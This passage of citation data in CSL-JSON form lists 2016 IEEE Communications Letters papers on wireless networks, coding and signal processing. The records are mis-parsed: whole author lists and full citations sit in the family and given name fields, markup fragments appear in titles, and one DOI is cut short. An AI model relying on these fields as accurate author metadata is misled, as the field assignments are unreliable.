https://doi.org/10.1109/LCOMM.2016.2530706","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nguyen, V., Oo, T. Z., Chuan, P., &amp; Hong","given":"C. S. (2016). An Efficient Time Slot Acquisition on the Hybrid TDMA/CSMA Multichannel MAC in VANETs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2536672","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shao, H., Jing, W., Wen, X., Lu, Z., Zhang, H., Chen, Y., &amp; Ling","given":"D. (2016). Joint Optimization of Quality of Experience and Power Consumption in OFDMA Multicell Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2508924","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, B., Lei, M., &amp; Zhao","given":"M. (2016). An Optimal Resource Allocation Method for Multi-User Multi-Relay DF Cognitive Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2531699","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lei, H., Zhang, H., Ansari, I. S., Gao, C., Guo, Y., Pan, G., &amp; Qaraqe","given":"K. A. (2016). Performance Analysis of Physical Layer Security Over Generalized-&lt;inline-formula&gt; &lt;img src=“/images/tex/523.gif” alt=“K”&gt; &lt;/inline-formula&gt; Fading Channels Using a Mixture Gamma Distribution. IEEE Communications Letters. https://doi.org/10.1","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Traverso","given":"S. (2016). A Family of Square-Root Nyquist Filter With Low Group Delay and High Stopband Attenuation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2556679","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hu, G. Y., &amp; Qiao","given":"P. L. (2016). Cloud Belief Rule Base Model for Network Security Situation Prediction. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2524404","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mishra, A., &amp; Jagannatham","given":"A. K. (2016). SBL-Based GLRT for Spectrum Sensing in OFDMA-Based Cognitive Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564381","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, T., &amp; Wang","given":"B. (2016). Joint Transceiver Beamforming Design for End-to-End Optimization in Full-Duplex MIMO Relay System With Self-Interference. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2592502","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kim, J., Kim, S., Bang, J., &amp; Hong","given":"D. (2016). Adaptive Mode Selection in D2D Communications Considering the Bursty Traffic Model. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521371","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ahmad, H., Saxena, N., Roy, A., &amp; De","given":"P. (2016). Extending Video Playback Time With Limited Residual Battery. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2581798","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, Q., Li, H., Wu, G., &amp; Li","given":"S. (2016). Retrospective Network Coding Alignment Over &lt;inline-formula&gt; &lt;img src=“/images/tex/523.gif” alt=“K”&gt; &lt;/inline-formula&gt;-User MIMO Y Channel. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2519517","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao, P., Wang, Z., &amp; Wang","given":"Q. (2016). Construction of Multiple-Rate QC-LDPC Codes Using Hierarchical Row-Splitting. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553658","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fang, L., &amp; Huang","given":"D. (2016). Neumann Series Expansion Based LMMSE Channel Estimation for OFDM Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2526624","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Abebe, A. T., &amp; Kang","given":"C. G. (2016). Iterative Order Recursive Least Square Estimation for Exploiting Frame-Wise Sparsity in Compressive Sensing-Based MTC. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539255","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chu, Z., Zhu, Z., &amp; Hussein","given":"J. (2016). Robust Optimization for AN-Aided Transmission and Power Splitting for Secure MISO SWIPT System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2572684","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao, J., Liu, Y., Yu, C., Yu, J., &amp; Li","given":"S. (2016). A Modified Band-Limited Digital Predistortion Technique for Broadband Power Amplifiers. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585652","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Dang, X., Liu, Z., Li, B., &amp; Yu, X. (2016). Noncoherent Multiple-Symbol Detector of Binary CPFSK in Physical-Layer Network Coding. IEEE Communications Letters, 20(1)","given":"81–84. https://doi.org/10.1109/LCOMM.2015.2499249","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fong","given":"S. L. (2016). Output Distributions of Capacity-Achieving Codes for Gaussian Multiple Access Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2549514","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jiang, R., Wang, Z., Wang, Q., &amp; Dai","given":"L. (2016). A Tight Upper Bound on Channel Capacity for Visible Light Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497694","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Enayati, S., &amp; Saeedi","given":"H. (2016). Deployment of Hybrid FSO/RF Links in Backhaul of Relay-Based Rural Area Cellular Networks: Advantages and Performance Analysis. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2582865","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Foddis, G., Garroppo, R., Giordano, S., Procissi, G., Roma, S., &amp; Topazzi","given":"S. (2016). Modeling RACH Arrivals and Collisions for Human-Type Communication. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560819","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ghoreishi, S. E., &amp; Aghvami","given":"A. H. (2016). Power-Efficient QoE-Aware Video Adaptation and Resource Allocation for Delay-Constrained Streaming Over Downlink OFDMA. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518684","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Awasthi, S. K., &amp; Singh","given":"Y. N. (2016). Generalized Analysis of Convergence of Absolute Trust in Peer-to-Peer Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2561284","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, J., Wang, S., &amp; Yin","given":"X. (2016). A Spherical-Wavefront-Based Scatterer Localization Algorithm Using Large-Scale Antenna Arrays. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585478","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mai, V. V, Jeong, Y., &amp; Shin","given":"H. (2016). Error Exponents for Distributed Detection. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2502943","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kumar, S., Rosnes, E., &amp; Amat","given":"A. G. i. (2016). Secure Repairable Fountain Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2574355","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, Y., Zheng, Z., Xie, L., &amp; Zhang","given":"X. (2016). DRDP: A DDoS-Resilient Data Pricing Mechanism. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2589261","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, X., Qiu, L., &amp; Dong","given":"Y. (2016). Asymptotic Equivalent Performance of Multicell Massive MIMO With Spatial&amp;#x2013;Temporal Correlation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2512585","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ghari, P. M., Shahbazian, R., &amp; Ghorashi","given":"S. A. (2016). Wireless Sensor Network Localization in Harsh Environments Using SDP Relaxation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498179","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Singh, K. M., &amp; Sumathi","given":"P. (2016). Moving-Window DFT Based Frequency-Locked Loop for FM Demodulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2537342","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pikus, M., Kramer, G., &amp; Bocherer, G. (2016). Discrete Signaling for Non-Coherent, Single-Antenna, Rayleigh Block-Fading Channels. IEEE Communications Letters, 20(4)","given":"764–767. https://doi.org/10.1109/LCOMM.2016.2531043","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, G., Chen, X., Lu, Y., &amp; Gao","given":"Q. (2016). Enabling Tunneling in CCN. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2500899","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zou, Y., &amp; Wan","given":"Q. (2016). Asynchronous Time-of-Arrival-Based Source Localization With Sensor Position Uncertainties. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2589930","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Turan, M., Oner, M., &amp; Cirpan, H. A. (2016). Joint Modulation Classification and Antenna Number Detection for MIMO Systems. IEEE Communications Letters, 20(1)","given":"193–196. https://doi.org/10.1109/LCOMM.2015.2500898","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ho, T. M., Tran, N. H., Le, L. B., Saad, W., Kazmi, S. M. A., &amp; Hong","given":"C. S. (2016). Coordinated Resource Partitioning and Data Offloading in Wireless Heterogeneous Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2536729","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, Z., Huang, N., Xu, H., Pan, Y., Li, Y., &amp; Chen","given":"M. (2016). Downlink Resource Allocation and Power Control for Device-to-Device Communication Underlaying Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2569498","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Esmat, H. H., Elmesalawy, M. M., &amp; Ibrahim","given":"I. I. (2016). Adaptive Resource Sharing Algorithm for Device-to-Device Communications Underlaying Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517012","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Karaca, M., &amp; Landfeldt","given":"B. (2016). Approaching Optimal Centralized Scheduling With CSMA-Based Random Access Over Fading Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2547951","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Soteh, A. G., &amp; Bizaki","given":"H. K. (2016). On the Analytical Solution of Rank Problem in the Convolutional Code Identification Context. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2519519","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, J., Shi, Z., Liu, Z., Zhang, Z., &amp; Liu","given":"Q. (2016). Multi-CRC Polar Codes and Their Applications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2508022","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, Y., Zhuang, Y., Lan, H., Zhou, Q., Niu, X., &amp; El-Sheimy","given":"N. (2016). A Hybrid WiFi/Magnetic Matching/PDR Approach for Indoor Navigation With Smartphone Sensors. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2496940","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Moghadam, N., &amp; Li","given":"H. (2016). Queue Stability Analysis in Network Coded Wireless Multicast Network. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2524453","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tahar, M., Wang, T. Q., Medina, M. F. G., Gonz&amp;#x00E1;lez, O., &amp; Armstrong","given":"J. (2016). Experimental Demonstration of Diversity Combining for Asymmetrically Clipped Optical OFDM. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517003","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vangala, H., Hong, Y., &amp; Viterbo","given":"E. (2016). Efficient Algorithms for Systematic Polar Encoding. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497220","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lee, Y., Uh, M., &amp; Chang","given":"S. H. (2016). Comments and Corrections on &amp;#x201C;A Novel QO-STBC Scheme With Linear Decoding for Three and Four Transmit Antennas&amp;#x201D; IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2574354","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Park, E. Y., Song, M. G., Choi, W., &amp; Im","given":"G. H. (2016). Maximization of Long-Term Average Throughput for Cooperative Secondary System With HARQ-Based Primary System in Cognitive Radio Network. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504365","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, G., Li, A., Yang, K., Zhao, L., Du, Y., &amp; Cheng","given":"D. (2016). Energy-Efficient Power and Time-Slot Allocation for Cellular-Enabled Machine Type Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504980","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, Y., Chen, Z., Cao, J., Li, H., Li, C., Wang, Y., … Guo","given":"J. (2016). CAMP: A New Bitmap Index for Data Retrieval in Traffic Archival. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2551719","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fu, Y., Wang, X., Liu, C., &amp; Zhu","given":"W. P. (2016). A Precoding-Based Compute-and-Forward. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2549513","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, R., Sheng, M., Lui, K. S., Wang, X., Wang, Y., &amp; Zhou","given":"D. (2016). An Analytical Framework for Resource-Limited Small Satellite Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509993","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mirahsan, M., Yanikomeroglu, H., Senarath, G., &amp; &amp;#x00D0;&amp;#x00E0;o","given":"N. D. (2016). Analytic Modeling of SIR in Cellular Networks With Heterogeneous Traffic. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2572688","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Du, Y., Dong, B., Chen, Z., Fang, J., Gao, P., &amp; Liu","given":"Z. (2016). Low-Complexity Detector in Sparse Code Multiple Access Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2592912","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Boddu, S., Philip, B. V, &amp; Das","given":"S. S. (2016). Analysis of Bandwidth Requirement of Users in Flexible Reuse Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2514354","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lakshmi Narasimhan, T., &amp; Chockalingam, A. (2016). On the Capacity and Performance of Generalized Spatial Modulation. IEEE Communications Letters, 20(2)","given":"252–255. https://doi.org/10.1109/LCOMM.2015.2497255","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, F., Zhao, H., Quan, X., Liu, Y., &amp; Tang","given":"Y. (2016). Eigen Domain Interference Rejection Combining Algorithm for MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2538258","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, C., &amp; Tang","given":"J. (2016). Blind Beamforming Technique for Reception of Multipath Coherent Signals. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2547873","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhai, D., Sheng, M., Wang, X., Li, Y., Song, J., &amp; Li","given":"J. (2016). Rate and Energy Maximization in SCMA Networks With Wireless Information and Power Transfer. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504439","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"&amp;#x015E;enel, K., &amp; Akar","given":"M. (2016). A Consensus-Based Coverage Algorithm For Self-Organizing Femtocell Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499190","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, S., Li, J., &amp; Tang","given":"X. (2016). Hadamard Minimum Storage Regenerating Code Revisited. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518671","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, J., Dai, L., Sun, S., &amp; Wang","given":"Z. (2016). On the Spectral Efficiency of Massive MIMO Systems With Low-Resolution ADCs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2535132","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mili, M. R., Hamdi, K. A., Marvasti, F., &amp; Bennis","given":"M. (2016). Joint Optimization for Optimal Power Allocation in OFDMA Femtocell Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497697","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, Z., Ding, Z., Xu, P., &amp; Dai","given":"X. (2016). Optimal Precoding for a QoS Optimization Problem in Two-User MISO-NOMA Downlink. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2555907","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, R., Comaniciu, C., &amp; Poor, H. V. (2016). On Rate, Secrecy","given":"and Network Connectivity Tradeoffs for Wireless Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2570746","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Huang, Z., Jiang, H., &amp; Zhou","given":"K. (2016). An Improved Decoding Algorithm for Generalized RDP Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2522414","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ghamkhari, M., &amp; Mohsenian-Rad","given":"H. (2016). A Convex Optimization Framework for Service Rate Allocation in Finite Communications Buffers. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499740","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, J., Lee, J., &amp; Quek","given":"T. Q. S. (2016). Best Antenna Placement for Eavesdroppers: Distributed or Co-Located? IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578927","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lien, S. Y., Lee, J., &amp; Liang","given":"Y. C. (2016). Random Access or Scheduling: Optimum LTE Licensed-Assisted Access to Unlicensed Spectrum. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516527","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Haghighat, J., Eslami, M., &amp; Hamouda","given":"W. (2016). Relay Pre-Selection for Reducing CSI Transmission in Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2583431","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, X., Liu, Y., &amp; Liu","given":"F. (2016). Adaptive Threshold Estimation for Variable Rate MQAM in Full-Duplex Systems With Imperfect CSI. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2520940","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guidi, F., Decarli, N., Dardari, D., Natali, F., Savioli, E., &amp; Bottazzi, M. (2016). A Low Complexity Scheme for Passive UWB-RFID: Proof of Concept. IEEE Communications Letters, 20(4)","given":"676–679. https://doi.org/10.1109/LCOMM.2016.2530658","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, J., Feng, W., Chen, Y., &amp; Zhou","given":"S. (2016). Energy Efficient Power Allocation for Multicell Distributed Antenna Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498608","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Al-Talabani, A., Deng, Y., Nallanathan, A., &amp; Nguyen","given":"H. X. (2016). Enhancing Secrecy Rate in Cognitive Radio Networks via Multilevel Stackelberg Game. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2541658","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hwang, D., Choi, Y., &amp; Lee","given":"T. J. (2016). Optimization of Zero Forcing Beamformer for the Full Duplex Relay System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578919","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Esmail, M. A., Fathallah, H., &amp; Alouini","given":"M. S. (2016). An Experimental Study of FSO Link Performance in Desert Environment. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2586043","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, H., Song, R., &amp; Leung","given":"S. H. (2016). Optimal Uplink Access in Cognitive Femtocell Networks With Adaptive Modulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2543215","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Park, C. S., &amp; Park","given":"S. (2016). Analysis of RSRP Measurement Accuracy. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517631","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, D., Ma, W., Shao, S., Shen, Y., &amp; Tang","given":"Y. (2016). Performance Analysis of TDD Reciprocity Calibration for Massive MU-MIMO Systems With ZF Beamforming. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499283","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xi, Z., Zhu, J., &amp; Fu","given":"Y. (2016). Low-Complexity Detection of Binary CPM With Small Modulation Index. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503761","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kwon, D., Kang, H. S., &amp; Kim","given":"D. K. (2016). Robust Interference Exploitation-Based Precoding Scheme With Quantized CSIT. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2532882","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, Z., Ding, Z., Fan, P., &amp; Ma","given":"Z. (2016). Outage Performance for Dynamic Power Allocation in Hybrid Non-Orthogonal Multiple Access Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2581803","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, P., Schober, R., &amp; Bhargava","given":"V. K. (2016). Power Allocation for SC-FDE-Based CR Systems Under Explicit Primary User Protection. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2544830","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kazmi, S. M. A., Tran, N. H., Saad, W., Le, L. B., Ho, T. M., &amp; Hong","given":"C. S. (2016). Optimized Resource Management in Heterogeneous Wireless Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2527653","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Goeckel, D., Bash, B., Guha, S., &amp; Towsley","given":"D. (2016). Covert Communications When the Warden Does Not Know the Background Noise Power. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2507594","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Koganei, Y., Yofune, M., Li, C., Hoshida, T., &amp; Amezawa","given":"Y. (2016). SC-LDPC Code With Nonuniform Degree Distribution Optimized by Using Genetic Algorithm. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2545652","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lee, W., &amp; Schober","given":"R. (2016). Analysis of Coverage in Heterogeneous Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553145","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kulathumani, V., Arora, A., Sridharan, M., Parker, K., &amp; Lemon","given":"B. (2016). On the Repair Time Scaling Wall for MANETs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2572083","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Saberali, S. A., Saffar, H. E., Lampe, L., &amp; Blake","given":"I. (2016). Adaptive Delivery in Caching Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558144","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kim, B. W., &amp; Jung","given":"S. Y. (2016). Novel Flicker-Free Optical Camera Communications Based on Compressed Sensing. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2551718","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tan, S., Li, X., &amp; Dong","given":"Q. (2016). TrustR: An Integrated Router Security Framework for Protecting Computer Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2505312","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, H., Zeng, H., &amp; Wang","given":"P. (2016). Linear Estimation of Clock Frequency Offset for Time Synchronization Based on Overhearing in Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2510645","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Seufert, M., Griepentrog, T., Burger, V., &amp; Hobfeld, T. (2016). A Simple WiFi Hotspot Model for Cities. IEEE Communications Letters, 20(2)","given":"384–387. https://doi.org/10.1109/LCOMM.2015.2509074","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu","given":"Y. (2016). Wireless Information and Power Transfer for Multirelay-Assisted Cooperative Communication. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2535114","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shin, S., Han, D., Cho, H., Chung, J. M., Hwang, I., &amp; Ok","given":"D. (2016). TCP and MPTCP Retransmission Timeout Control for Networks Supporting WLANs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2542809","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Saber, M. J., &amp; Sadough","given":"S. M. S. (2016). Multiband Cooperative Spectrum Sensing for Cognitive Radio in the Presence of Malicious Users. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2505299","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Moghadam, N., &amp; Li","given":"H. (2016). A New Wireless Multicast Queuing Design Using Network Coding and Data-Flow Model. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2568212","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chamola, V., Krishnamachari, B., &amp; Sikdar","given":"B. (2016). An Energy and Delay Aware Downlink Power Control Strategy for Solar Powered Base Stations. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2529622","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xu, Y., &amp; Wang","given":"S. (2016). Mode Selection for Energy Efficient Content Delivery in Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2524401","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tian, K., Liu, R., &amp; Wang","given":"R. (2016). Joint Successive Cancellation Decoding for Bit-Interleaved Polar Coded Modulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2514279","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, W., Gu, Z., &amp; Jin","given":"M. (2016). Penalty Function Based Detector for Generalized Space Shift Keying Massive MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2526599","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, A., Yin, H., &amp; Wang, W. (2016). Performance Analysis of Energy Harvesting Wireless Communication System With Finite Blocklength. IEEE Communications Letters, 20(2)","given":"324–327. https://doi.org/10.1109/LCOMM.2015.2514096","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Abdelaziz, M., &amp; Gulliver","given":"T. A. (2016). Ternary Convolutional Codes for Ternary Phase Shift Keying. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2587698","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Qi, Y., Tang, C., &amp; Huang","given":"D. (2016). Binary Linear Codes With Few Weights. IEEE Communications Letters. 